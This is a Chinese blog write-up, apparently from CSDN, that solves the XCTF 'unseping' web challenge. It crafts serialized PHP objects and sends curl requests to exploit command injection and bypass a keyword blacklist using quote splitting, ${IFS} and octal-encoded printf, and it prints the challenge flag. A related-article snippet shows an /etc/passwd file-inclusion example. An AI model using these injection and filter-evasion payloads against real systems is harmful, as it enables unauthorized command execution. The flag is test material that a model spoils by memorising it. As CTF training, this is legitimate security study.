攻防世界-web-unseping

最新推荐文章于 2025-03-25 20:17:12 发布
最新推荐文章于 2025-03-25 20:17:12 发布
阅读量593 收藏
点赞数
分类专栏: 安全 文章标签: 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/wuh2333/article/details/134359980
版权

1. 题目描述

打开链接,如下代码

代码都贴出来了,那么只需要分析代码即可,看是否存在漏洞以及如何利用

2. 思路分析

代码很简单,外部只需要接收cft这个参数,然后将这个参数反序列化后赋值给对量的method和args参数,啊UI周内部存在执行命令的函数ping调用exec去执行外部传入的args参数,所以这里明显存在命令注入,关键是__wakeup函数中存在一个waf,waf中对传入的参数有个黑名单限制,但是,对于命令注入这种攻击手法来说,黑名单限制容易绕过,因此我们思路就很清晰了

2.1 存在命令注入,利用命令注入执行命令

2.2 尝试绕过waf的限制

3. 解题过程

3.1 我们先简单执行下pwd这个命令,证明确实存在命令注入

$str = serialize(new ease("ping", array("pwd")));
print(base64_encode($str));

我们传入的args是一个数组,这里可以搜下call_user_func_array这个函数的用法

curl -XPOST http://61.147.171.105:50248/ --data "ctf=Tzo0OiJlYXNlIjoyOntzOjEyOiIAZWFzZQBtZXRob2QiO3M6NDoicGluZyI7czoxMDoiAGVhc2UAYXJncyI7YToxOntpOjA7czozOiJwd2QiO319"

然后通过curl命令访问,得到结果如下

说明pwd命令执行成功

3.2 执行ls命令,尝试绕过黑名单的限制

这里使用单双引号绕过

$str = serialize(new ease("ping", array('l""s')));
print(base64_encode($str));

同样执行命令

curl -XPOST http://61.147.171.105:50248/ --data "ctf=Tzo0OiJlYXNlIjoyOntzOjEyOiIAZWFzZQBtZXRob2QiO3M6NDoicGluZyI7czoxMDoiAGVhc2UAYXJncyI7YToxOntpOjA7czo0OiJsIiJzIjt9fQ=="

得到结果为:

刚好找到一个flag_1s_here,经过验证,这是一个目录,这个时候同样执行ls命令,这里flag同样使用单双引号绕过即可,但是空格可以使用${IFS}替换

$str = serialize(new ease("ping", array('l""s${IFS}fla""g_1s_here')));
print(base64_encode($str));

同样,执行命令

curl -XPOST http://61.147.171.105:50248/ --data "ctf=Tzo0OiJlYXNlIjoyOntzOjEyOiIAZWFzZQBtZXRob2QiO3M6NDoicGluZyI7czoxMDoiAGVhc2UAYXJncyI7YToxOntpOjA7czoyNDoibCIicyR7SUZTfWZsYSIiZ18xc19oZXJlIjt9fQ=="

可以看到包含有flag的文件了

那么接下来就是执行cat flag_1s_here/flag_831b69012c67b35f.php命令获取该文件的内容,这里关键在于/该如何绕过,这里参考网上做法,通过八进制编码绕过(比如a可以表示成\141)

这里通过python简单转了下

然后再转成shell执行命令的形式

$str = serialize(new ease("ping", array('$(printf${IFS}"\143\141\164\40\146\154\141\147\137\61\163\137\150\145\162\145\57\146\154\141\147\137\70\63\61\142\66\71\60\61\62\143\66\67\142\63\65\146\56\160\150\160")')));
print(base64_encode($str));

最终执行命令

curl -XPOST http://61.147.171.105:50248/ --data "ctf=Tzo0OiJlYXNlIjoyOntzOjEyOiIAZWFzZQBtZXRob2QiO3M6NDoicGluZyI7czoxMDoiAGVhc2UAYXJncyI7YToxOntpOjA7czoxNjk6IiQocHJpbnRmJHtJRlN9IlwxNDNcMTQxXDE2NFw0MFwxNDZcMTU0XDE0MVwxNDdcMTM3XDYxXDE2M1wxMzdcMTUwXDE0NVwxNjJcMTQ1XDU3XDE0NlwxNTRcMTQxXDE0N1wxMzdcNzBcNjNcNjFcMTQyXDY2XDcxXDYwXDYxXDYyXDE0M1w2Nlw2N1wxNDJcNjNcNjVcMTQ2XDU2XDE2MFwxNTBcMTYwIikiO319"

得到结果为cyberpeace{443e57942c8c0bf6e2e0193b56f359a4}

4. 总结

4.1 这里没有通过burpsuite而是通过执行命令的方式来获取结果,因为我这边使用burpsuite没法正常显示,不清楚原因,有清楚的欢迎评论

4.2 这里关键在于命令注入各种各样的绕过方式,获益良多

攻防世界web新手练习unseping
JIN_7X的博客
09-26 5015
这是新手区第一题?不敢想象后边的题是什么样
2024年网络安全最新攻防世界Web- unseping 总结_unseping攻防世界
2401_84302722的博客
05-01 447
【代码】2024年网络安全最新攻防世界Web- unseping 总结_unseping攻防世界
2024年最全攻防世界Web- unseping 总结_unseping攻防世界(1)
2401_84297796的博客
05-01 584
/把 cat flag_1s_here/flag_831b69012c67b35f.php 转为8进制如下:"\143\141\164\40\146\154\141\147\137\61\163\137\150\145\162\145\57\146\154\141\147\137\70\63\61\142\66\71\60\61\62\143\66\67\142\63\65\146\56\160\150\160"可以说是**最科学最系统的学习路线**,大家跟着这个大的方向学习准没问题。
2025.2.10——二、unseping 代码审计|序列化和反序列化|魔术方法|命令执行绕过
2402_87387800的博客
02-11 1031
题目来源:攻防世界 unseping
攻防世界 - Web - Level 1 | unseping
Blue17 の 小窝
12-09 1844
IFS 是linux中的命令 $IFS默认指定space,tab,换行 也可以自己指定$IFS,例:IFS='&' $IFS可以把多个符号和并,如下: mm=11&&22&&33, echo $mm;中就是我们进行命令执行的参数,我们的目标是获取 Flag,但是目前我们连 Flag 的位置都不知道,所以首先我们肯定是要先检查目标当前文件夹下的文件有啥的,所以我们想要执行的命令为。PHP 官方文档中写名的,该函数第一个接收的是回调函数,第二个接收的是参数数组。传递的是一个数组类型的数据,为啥?
攻防世界web新手练习 -unseping
yuanxu8877的博客
10-19 9104
新版攻防世界XCTF-web新手练习
攻防世界】江苏工匠杯 Web unseping
DG_s1mple
12-30 1213
打开题目,发现又来到了我的知识盲区,php的反序列化首先我们来简单的讲一下,什么是反序列化反序列化,主要是两个函数通过序列化与反序列化我们可以很方便的在PHP中进行对象的传递。本质上反序列化是没有危害的。但是如果用户对数据可控那就可以利用反序列化构造payload攻击。
攻防世界unseping
m0_74979597的博客
09-07 717
表示easeargs属性的值为一个数组,其中1表示数组元素的数量,i:0表示数组的索引为0,s:2:""表示数组的值为"",0表示值的长度。这里很特殊,又不是写一些特殊字符,让它错误的认为代码,或构成新代码来进行绕过,它只是一种与字符串比较进行匹配,只要没有包含。命令与文件之间有空格,怎么办,用${IFS} 这是特殊的环境变量,在Unix/linux 用来字段分割符;O:4:"ease":2: 类名为ease的对象,4表示类名的长度,2表示对象属性的数量。2.绕过简单的防火墙,用“”,‘’,
攻防世界Web- unseping 总结
weixin_62871152的博客
11-02 3101
攻防世界-WEB
Web攻防世界unseping
qq_55038440的博客
09-02 1092
ping($ip):内部调用exec($ip, $result)函数,这是一个 PHP 内置函数,用于执行外部程序或系统命令,带有两个参数,前一个是执行外部程序或系统命令,第二个参数是把执行结果存储,通常该参数是数组。__destruct():对象被销毁时候调用,可以看见这个函数的作用是判断method是否等于ping,等于则调用回调函数。__wakeup():是调用unserialize(base64_decode($ctf))时会调用的函数,作用是遍历数组,调用waf函数过滤非法字符。
攻防世界 - Web - Level 1 unseping
m0_74825541的博客
12-26 1038
中就是我们进行命令执行的参数,我们的目标是获取 Flag,但是目前我们连 Flag 的位置都不知道,所以首先我们肯定是要先检查目标当前文件夹下的文件有啥的,所以我们想要执行的命令为。本关是一个 PHP 代码审计关卡,考察的是 PHP 反序列化漏洞以及命令执行的一些绕过手段,下面笔者将带你一步步过关。PHP 官方文档中写名的,该函数第一个接收的是回调函数,第二个接收的是参数数组。如上,我们成功得到了 Flag 的存放地址,此时注意了页面显示的。结合上面两个函数,很明显,我们要生成一个对象,并给这个对象的。
攻防世界-web-1
最新发布
2301_80281749的博客
03-25 737
在URL后面加上/.robots.txt直接在URL后面添加/fl0g.php。
【愚公系列】2023年05月 攻防世界-Webunseping
热门推荐
时光隧道
05-25 1万+
反序列化漏洞是一种安全漏洞,存在于那些使用序列化技术的应用程序中。反序列化是将已序列化数据还原回对象的过程。攻击者可以通过构造恶意序列化数据来利用反序列化漏洞,从而在受害者的系统上执行任意代码或者进行远程攻击。攻击者可以通过修改序列化数据中的类名来指定一个恶意的类,该类将在反序列化过程中被实例化并执行其中的代码。攻击者还可以利用在对象反序列化期间执行的构造函数或readObject()方法中的任意代码执行漏洞,来进行恶意代码执行。
Web安全攻防世界04 unseping(江苏工匠杯)
weixin_42789937的博客
12-01 2017
Web安全攻防世界04 unseping(江苏工匠杯)参考大佬们的WP有所补充,时隔多月再次整理博文,修复了原来不明白的点,内容小白友好~
攻防世界 unseping
weixin_68416970的博客
01-17 762
攻防世界平台 web题库矩阵 新手模式 unseping
攻防世界unseping
m0_73303597的博客
11-12 1744
自用
攻防世界-web-file_include
12-06
在网络安全领域,文件包含漏洞(File Inclusion Vulnerability)是一种常见且危险的安全漏洞。文件包含漏洞通常出现在Web应用程序中,允许攻击者通过特定的参数或输入来包含并执行任意文件,从而可能导致服务器被完全控制或敏感信息泄露。 文件包含漏洞主要分为两种类型: 1. **本地文件包含(Local File Inclusion, LFI)**: - 攻击者可以包含服务器上的本地文件。 - 例如,攻击者可以通过修改URL参数来包含服务器的敏感配置文件或密码文件。 2. **远程文件包含(Remote File Inclusion, RFI)**: - 攻击者可以包含远程服务器上的文件。 - 例如,攻击者可以通过修改URL参数来包含远程服务器上的恶意脚本,从而执行任意代码。 ### 示例 假设有一个简单的PHP脚本用于包含文件: ```php <?php $file = $_GET['file']; include($file); ?> ``` 在这个例子中,攻击者可以通过修改`file`参数来包含任意文件。例如,访问以下URL: ``` http://example.com/page.php?file=/etc/passwd ``` 攻击者可以获取服务器的`/etc/passwd`文件内容。 ### 防御措施 1. **输入验证**:确保用户输入的文件名符合预期,例如只允许包含特定目录下的文件。 2. **使用白名单**:定义一个允许包含的文件列表,拒绝所有不在白名单中的文件。 3. **禁用远程文件包含**:在PHP配置文件中设置`allow_url_include`为`Off`,防止远程文件包含。 4. **最小权限原则**:确保Web服务器进程只具有必要的文件访问权限。 ###
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值